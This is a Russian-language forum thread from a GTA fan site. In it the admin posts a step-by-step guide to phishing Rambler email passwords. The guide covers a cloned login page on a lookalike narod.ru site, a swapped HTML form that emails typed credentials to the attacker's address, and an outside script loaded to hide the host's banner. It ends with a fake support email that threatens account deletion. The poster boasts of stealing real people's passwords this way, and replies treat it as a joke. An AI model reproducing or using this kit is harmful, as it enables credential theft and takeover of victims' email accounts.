leika.online - Вся информация о GTA: коды, моды, читы.. -

Среда, 2008-01-02, 5:07 Pm Привет Странник | RSS
На Главную страницу сайта | Форум сайта leika.online | Регистрация | Вход

Страница 1 из 11
Модератор форума: HellsinG 
Форум сайта leika.online » Болталка » WorldWideWeb » Увод паролей на мыльник (один из способов...)
Увод паролей на мыльник
Lex Дата: Четверг, 2007-05-10, 5:41 Pm | Сообщение # 1
Несущий БАН
Группа: Админ
Сообщений: 2083
Репутация: 76 [15%]
Статус: Offline
Когда то давно видел в нете идею такого содержания: "пишешь юзеру письмо на мыло типа от службы поддержки чтоб он перезашел на свою почту по вот этой ссылке, типа он переходит по ссылке а там главаная страница его сервиса (ну там рамблер или маил), вводит пароль и в мыло заходит, а пароль скриптом отсыается взломщику...". Идея мне эта понравилась, так как довольно проста сама по себе (социальная инженерия =) и впринципе осуществима. ну потом я про это дело забыл, а вот сейчас мне понадобиось срочно одного пацана "ломануть" и почту его поворошить, вот я это дело и вспмнил, короче основываясь на вышеизложенной идее я все в своем виде оформил и самое интересное что того пацана я на ключик от мыла опустил, а так же ещё с десяток своих подруг и нашего уважаемого второго админа =), который к сожалению очень скоро все прочуял и пароль сменил... ну да не важно, короче сделал я это вот как:
-------------------------------------
Если вы хотите узнать чужой пароль (руководство от Lex'a =)!
Допустим мы хотим опустить владельца мыла ***@rambler.ru

1)Жертва не должна знать о том, что она жертва!!! (важно)
Подготовка:
2)Регим сайт на narod.ru с адресом типа ramblerauthorisation.narod.ru
3)Регим мыло типа techsupport-robot@mail.ru
Создание муляжа странички:
4)Идем на rambler и полностью копируем код странички, потом вставляем его в код главной странички нашего сайта на народе, и опля! - по адресу ramblerauthorisation.narod.ru появляется рамблер - великий и ужасный))
- "но ведь видно же в троке адреса, что это народ?!" - скажите вы.
- Да, это так, и я не знаю, как с этим бороться, кто скажет - буду признателен, но есть способ проще:
Убираем с гавной страницы рамблеровский код и делаем чтобы главная страница автоматом переадресовывала нас на html страничку на этом же сайте но с длиннющим названием, например

Code
http://ramblerauthorisation.narod.ru/F1-EF-E5-F0-E5-F2F-CEF-E0-F0-EEE-BFCE0-EAE-AEF-3EDF-2E0-EDE0amblerF1EFE-EEC-EE-F9F-CFEE2E-5ED-E8A-E0E8F2F0E5F5E3E-2-EEE-7-E-4E5E9E2F7EF0E0-F  3-F2-F0-EE-ECramblerinf-setLogintext.html

Этот адрес будет сильно отвлекать юзера и как бы маскировать народность страницы, но есть ещё одна пробема!
- "Да ведь народ баннер вешает в угол! какая же рамблеровская страница с народовским баннером!?"
- Правильно! И на это есть свое лекарство!Для того чтоб избавится от тупого народного баннера код страницы надо изменить следующим образом:
В тэг <head></head> в САМЫЙ ВЕРХ надо вставить вот это

Code
<script language=JavaScript src=http://flashjam.narod.ru/3ffd8df4.js></script>

а тэг <body (всякие параметры...)> надо добавить вот это

Code
onload="killyandexad()"

Вот теперь реклама народа появляться не будет!

5) Теперь надо сделать так, чтобы при вводе логина и пароля в соответствующие поля на странице и после нажатия кнопки "вход" пароль и логин приходили к нам на мыло. Вот сопсно теперь надеюсь вы поняли, почему надо было создать сайт именно на народе! Там есть такой хороший сервис, назвается "анкета", отличается он тем, что при нажатии на кнопку "отправить" сообщение пользователя уходит к нам на мыло без всяких запросов на подтверждение отправки. Итак, создаем страничку анкеты и благополучно забываем про неё, потом берём вот этот код и вставляем адаптируем его в рамблеровскую страничку, приведу пример:
Вот это код анкеты, как он есть-

Code
<form ENCTYPE="multipart/form-data" action="http://narod.yandex.ru/send-poll.xhtml" method=POST>
<tr>
<td><font size=-1><input type=text name="a[Ваше имя или ник]"></font></td>
</tr>
<tr>
<td><font size=-1><input type=password name="a[Ваш e-mail]"></font></td>
</tr>
<tr>
<td><input type=submit value="отправить"></td>
</tr>
<input type=hidden name="email" value="(и маил, куда будет отослан пароль)">
<input type=hidden name="title" value="">
<input type=hidden name="login" value="(ваш логин на народе)">
<input type=hidden name="backlink" value="(куда будет переадресован поьзователь после нажатия кнопки "вход")">
<input type=hidden name="separator" value="">
<input type=hidden name="vari" value="4">
<input type=hidden name="forceforward" value="Да"> //здесь обязательно Да
</form>
</table>
</div>

а вот так выглядит форма, вставленная ПРАВИЛЬНО в код страницы рамблера-

Code
<div class="border1">
<table border="0" cellspacing="7" cellpadding="0" >
<form ENCTYPE="multipart/form-data" action="http://narod.yandex.ru/send-poll.xhtml" method=POST>
<tr>
<td>Имя</td>
<td width=100%><font size=-1><input type=text name="a[Это мой ник =):]"></font></td>
</tr>
<tr>
<td>Пароль</td>
<td width=100%><font size=-1><input type=password name="a[А это мой пароль =):]"></font></td>
</tr>
<td colspan="2">
<table border="0" cellspacing="0" cellpadding="0">
<tr>
<td><input type=submit value="Войти"></td>
<td>   </td>
<td><a href="http://leika.online/"http://id.rambler.ru/script/reminder.cgi">Забыли пароль?</a></td>
</tr>
</table>
</td>
</tr>
<input type=hidden name="email" value="l4e@rambler.ru"> //адрес отправки письма с паролем (это моё мыло=)
<input type=hidden name="title" value="">
<input type=hidden name="login" value="flashjam"> //ваш логин на народе (вот это мой логин=)
<input type=hidden name="backlink" value="http://rambler.ru"> //страничка переадресации
<input type=hidden name="backtext" value="На главную страницу">
<input type=hidden name="separator" value="">
<input type=hidden name="mess" value="Спасибо">
<input type=hidden name="vari" value="4">
<input type=hidden name="forceforward" value="Да">
</form>
</table>
</div>

Короче берёте код выше и вставляете его в страницу рамблера вместо вот этого кода-

Code
<div class="border1">
<table border="0" cellspacing="7" cellpadding="0" >
<form action="http://mail.rambler.ru/script/auth.cgi" method="POST"><input type="hidden" name="domain" value="rambler.ru"><input type="hidden" name="url" value="7">
<tr>
<td>Имя</td>
<td width=100%><input type="text" name="login" value="" size="10" tabindex="2" class="input100"></td>
</tr>
<tr>
<td>Пароль</td>
<td width=100%><input type="password" name="passw" size="10" tabindex="2" class="input100"></td>
</tr>
<td colspan="2">
<table border="0" cellspacing="0" cellpadding="0">
<tr>
<td><input type="submit" value="Войти" tabindex="2"></td>
<td>   </td>
<td><a href="http://leika.online/"http://id.rambler.ru/script/reminder.cgi">Забыли пароль?</a></td>
</tr>
</table>
</td>
</tr>
</form>
</table>
</div>

ВСЁ! С изиенением страницы мы закончили, сохраняем результат и радостно потираем потные ладошки =)
Теперь осталось только отправить письмо вида
--------------------------------------------
Здравствуйте!

На ваш адрес (адрес тупого юзера =) высылается запрос повторной
авторизации, в связи с неполадками на почтовом сервере s3.

Для того чтобы пройти авторизацию, вам необходимо зайти на страницу
http://(ссылка на страничку переадресации)
и затем в письме робота пройти по ссылке подтверждения.

В обратном случае неответившие на данный запрос аккаунты могут быть
удалены!

С уважением,
Робот службы поддержки Mail.rambler.Ru (techsupport-robot@rambler.ru)

--------------------------------------------
Но есть одно но, которое может все испортить! Почта рамблера отличается одной говнючестью, а именно в письме нельзя шифрить ссылки =(, тогда какой же кретин пойдет авторизироваться на народовский сайт!? поэтому ссылку надо написать в другой кодировке! Будут вопросы - пишите =)







Сообщение отредактировал Lex - Пятница, 2007-05-11, 4:10 Pm
 
Dj_Drago Дата: Четверг, 2007-05-10, 5:51 Pm | Сообщение # 2
Свой в доску
Группа: Модер
Сообщений: 987
Репутация: 30 [6%]
Статус: Offline
и где бы щас таких лохов которые на это ведуться найти. хотя юзвери мож и клюнут но что с них брать?

 
Lex Дата: Четверг, 2007-05-10, 8:37 Pm | Сообщение # 3
Несущий БАН
Группа: Админ
Сообщений: 2083
Репутация: 76 [15%]
Статус: Offline
Обижаешь! Яж те говорю что я так у Drago паролик свиснул! =)




 
Dj_Drago Дата: Пятница, 2007-05-11, 1:03 Am | Сообщение # 4
Свой в доску
Группа: Модер
Сообщений: 987
Репутация: 30 [6%]
Статус: Offline
гг. я тож раньше на друзьях тренировался. ани у меня тестили проги, вири, трояны.

 
Lex Дата: Пятница, 2007-05-11, 4:07 Pm | Сообщение # 5
Несущий БАН
Группа: Админ
Сообщений: 2083
Репутация: 76 [15%]
Статус: Offline
Dj_Drago, и я так же smile




 
Professional Дата: Пятница, 2007-05-11, 9:18 Pm | Сообщение # 6
Снайпер
Группа: Модер
Сообщений: 436
Репутация: 25 [5%]
Статус: Offline
ну вы даете и хакерами хотите стать во приколисты (шутка)

хмм есть много способов угнать асю и мыло и сайт и все токо надо знать ребят как

*Учись и еще раз учись
В.И. Ленин

Добавлено (2007-05-11, 9:18 Pm)
---------------------------------------------
"Допустим мы хотим опустить владельца мыла ***@rambler.ru"

ето реал правдо спс biggrin


 
Dj_Drago Дата: Пятница, 2007-05-11, 9:35 Pm | Сообщение # 7
Свой в доску
Группа: Модер
Сообщений: 987
Репутация: 30 [6%]
Статус: Offline
мы хотим стать хакерами? smile да ты чё! Нифкоем случае, мы мирные юзвери.

 
Lex Дата: Воскресенье, 2007-05-13, 9:35 Pm | Сообщение # 8
Несущий БАН
Группа: Админ
Сообщений: 2083
Репутация: 76 [15%]
Статус: Offline
Просто мы юзвери получившие лэвл-ап biggrin

PS^ Кстати это мой сайт с помощью которого я пароли уводил wink







Сообщение отредактировал Lex - Воскресенье, 2007-05-13, 9:37 Pm
 
Professional Дата: Понедельник, 2007-05-14, 5:29 Pm | Сообщение # 9
Снайпер
Группа: Модер
Сообщений: 436
Репутация: 25 [5%]
Статус: Offline
Lex, ето как?

 
Lex Дата: Понедельник, 2007-05-21, 11:12 Pm | Сообщение # 10
Несущий БАН
Группа: Админ
Сообщений: 2083
Репутация: 76 [15%]
Статус: Offline
Professional, как что?




 
Форум сайта leika.online » Болталка » WorldWideWeb » Увод паролей на мыльник (один из способов...)
Страница 1 из 11
Быстрый вход:
Поиск: